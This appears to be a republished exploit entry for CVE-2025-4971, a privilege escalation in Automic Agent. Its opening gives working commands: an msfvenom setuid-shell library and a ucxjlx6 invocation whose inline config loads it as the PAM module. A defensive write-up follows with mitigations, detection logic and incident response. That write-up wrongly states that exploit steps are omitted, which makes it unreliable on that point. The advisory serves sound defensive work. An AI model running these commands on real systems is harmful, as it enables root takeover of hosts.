Automic Agent 24.3.0 HF4 - Privilege Escalation

Exploit Author: Flora Schäfer Analysis Author: www.bubbleslearn.ir Category: Remote Language: Unknown Published Date: 2025-05-29 
# Exploit Title: Automic Agent 24.3.0 HF4 - Privilege Escalation
# Date: 26.05.2025
# Exploit Author: Flora Schäfer
# Vendor Homepage: https://www.broadcom.com/products/software/automation/automic-automation
# Version: <24.3.0 HF4, <21.0.13 HF1
# Tested on: Linux
# CVE : CVE-2025-4971

1. Generate shared object file using msfvenom
$ msfvenom -p linux/x64/exec PrependSetuid=True PrependSetguid=True CMD="/bin/sh" -f elf-so > /tmp/sh.so

2. Run the ucxjlx6 executable as follows
$ ./ucxjlx6 ini=<(echo -e "[GLOBAL]\nhelplib = /dev/null\nsystem = blep\n[MISC]\nauthentication = PAM\n[PAM]\nlibName = /tmp/sh.so\n[VARIABLES]\nUC_EX_JOB_MD=blep")


Automic Agent 24.3.0 HF4 / 21.0.13 HF1 — Privilege Escalation (CVE-2025-4971)

This article examines CVE-2025-4971, a local privilege escalation vulnerability affecting older releases of the Automic (Broadcom) Agent software. It explains the root cause in conceptual terms, the likely impact for affected environments, recommended mitigations and detection strategies, and incident response guidance. Actionable exploit steps are intentionally omitted; the focus is defensive: identifying, mitigating and detecting abuse.

Summary

  • Vulnerability: Local privilege escalation via unsafe dynamic PAM library selection in the Automic Agent binary.
  • Affected versions: Automic Agent releases earlier than 24.3.0 HF4 and earlier than 21.0.13 HF1.
  • Identifier: CVE-2025-4971 (disclosed 2025-05-26).
  • Impact: Local attacker with ability to run or influence agent start-up can execute arbitrary code with agent privileges (which may be elevated), potentially resulting in full system compromise.
  • Status: Vendor remediation released in the fixed releases cited above. Apply vendor hotfixes or upgrades immediately when possible.

Technical root cause (conceptual)

The vulnerability stems from the agent’s configuration handling and the way it integrates with the PAM (Pluggable Authentication Modules) subsystem. A privileged agent binary accepted a configuration value that controlled which PAM library to load. If that configuration could be crafted to point to an attacker-controlled shared object living in a writable location, the agent could load and execute code from that library in the agent’s privileged context.

At a high level the failure modes are:

  • Accepting unsanitized configuration input that controls a native library path.
  • Loading the specified library in a privileged process (e.g., a setuid/setgid or otherwise elevated agent) without validating ownership/permissions or restricting allowed library locations.
  • Using writable temporary or untrusted directories for files that will be loaded by privileged code (for example, /tmp).

Why this is dangerous

  • Any local user who can influence configuration or deposit files in a writable directory that the agent accepts can cause privileged code execution.
  • Once arbitrary code runs as the agent owner (often root or an account with elevated rights), the attacker can escalate to full system compromise, steal credentials, or move laterally.

Vendor fixes and patch guidance

  • Vendor-released fixes are included in Automic Agent 24.3.0 HF4 and 21.0.13 HF1. Upgrade to the patched releases as the primary remediation.
  • If immediate patching is not feasible, consider the mitigation options below to reduce exposure until an update is applied.

Recommended mitigations (prioritized)

  • Patch immediately: Upgrade to the vendor-supplied fixed builds (24.3.0 HF4 or 21.0.13 HF1 or later).
  • Restrict writable locations: Ensure temporary and runtime directories (e.g., /tmp, /var/tmp) are mounted with appropriate options (noexec where possible) and have strict permissions to prevent untrusted library placement.
  • Reduce privileges: Run agent processes as unprivileged, dedicated accounts without unnecessary setuid/setgid bits. Remove setuid from binaries that do not require it.
  • Harden configuration handling: Prevent use of configuration sources that can be influenced by unprivileged users. Avoid allowing arbitrary paths for native libraries in configuration files.
  • Use MAC: Enforce Mandatory Access Control (SELinux/AppArmor) policies that restrict which libraries the agent can load and which files it may execute.
  • File integrity monitoring: Monitor for the creation of unexpected .so files in writable directories and for modifications to agent binaries and configs.
  • Network isolation: Limit agent startup and management to protected administrative networks and hosts to reduce the set of users who can trigger or influence the agent process.

Detection strategies and indicators of compromise (IoCs)

Detection should focus on the indicators that would accompany attempts to exploit this class of vulnerability (library drops in writable locations, unexpected library loads, suspicious agent invocations). Below are defensive detection concepts — not exploit instructions.

  • Alert on creation of shared objects (.so) in world-writable locations (e.g., /tmp) by non-privileged users.
  • Monitor the agent process startup arguments and configuration sources — unexpected config paths, use of process substitution, or configuration files referencing external/untrusted paths should be flagged.
  • Log and alert on dynamic linker activity where a privileged process loads libraries from non-standard locations.
  • Use audit logs to detect any execution of shells or escalation-related binaries immediately after agent startup.

// Pseudocode detection rule (conceptual)
// Do not treat this as an executable script; adapt to your SIEM or EDR rules engine.

if process_name == "ucxjlx6" and config_contains_key("libName") and libName_path is in writable_location then
    alert("Potential unsafe PAM library reference in Automic Agent configuration")
end

Explanation: This pseudocode shows a high-level detection rule: alert when the Automic Agent starts (ucxjlx6 in this example) and its configuration includes a PAM library path that points to a writable/untrusted location. In practice, implement the logic in your SIEM/EDR with the actual process and config-parsing capabilities you have available.

Forensic and incident response recommendations

  • Isolate the host: Prevent further lateral movement by isolating impacted hosts from the network after an alert.
  • Preserve evidence: Collect audit logs, process lists, open file descriptors, loaded modules, and memory snapshots for analysis before rebooting or changing state.
  • Assess persistence: Look for malicious .so files, modified startup scripts, or cron/systemd changes installed after the agent execution time.
  • Credential hygiene: Assume credentials accessible to the agent may be compromised; rotate service accounts and credentials used by the agent.
  • Rebuild if necessary: If compromise is confirmed, rebuild hosts from known-good images after patching and strengthening protections.

Hardening checklist for Automic Agent deployments

Area Recommendation
Software Lifecycle Keep Automic Agent and related components patched to vendor-supported versions; subscribe to vendor advisories.
Privileges Run agents with the least privileges required; remove unnecessary setuid/setgid bits.
File permissions Restrict write permissions on directories from which privileged processes load code; use noexec for temporary filesystems where practical.
Monitoring Enable file integrity monitoring, audit logging for library loads and process starts, and alerting for suspicious changes.
Environment Use containerization or hardened chroots and MAC to limit the blast radius of a compromised agent process.

Responsible disclosure and exploit information

Vulnerability details were responsibly disclosed to the vendor prior to public announcements. The community and vendors publish proof-of-concept code only under controlled conditions for research; however, reproduction details and exploit commands are omitted here to avoid facilitating malicious use. Apply vendor-provided fixes and follow the mitigation guidance above.

Frequently Asked Questions (FAQ)

  • Q: Can this be exploited remotely? A: The vulnerability is a local privilege escalation. Remote exploitation requires an initial ability to run code or influence configuration on the target host.
  • Q: Is patching the only mitigation? A: Patching is the definitive fix. Interim mitigations (restricting writable locations, removing setuid bits, enforcing MAC policies) reduce the risk if patches cannot be deployed immediately.
  • Q: How urgent is this? A: High — local privilege escalation in software commonly deployed on servers can enable full host compromise and lateral movement. Prioritize patching in exposed environments.

References and further reading

  • Vendor product and security advisories (Broadcom / Automic): consult the vendor’s official support/security pages for the product and the published hotfix details.
  • CVE-2025-4971 — vendor and CERT advisories for remediation steps and fixed release notes.
  • General best practices for limiting dynamic library loading risks and for hardening privileged binaries (PAM hardening, file permissions, MAC policies).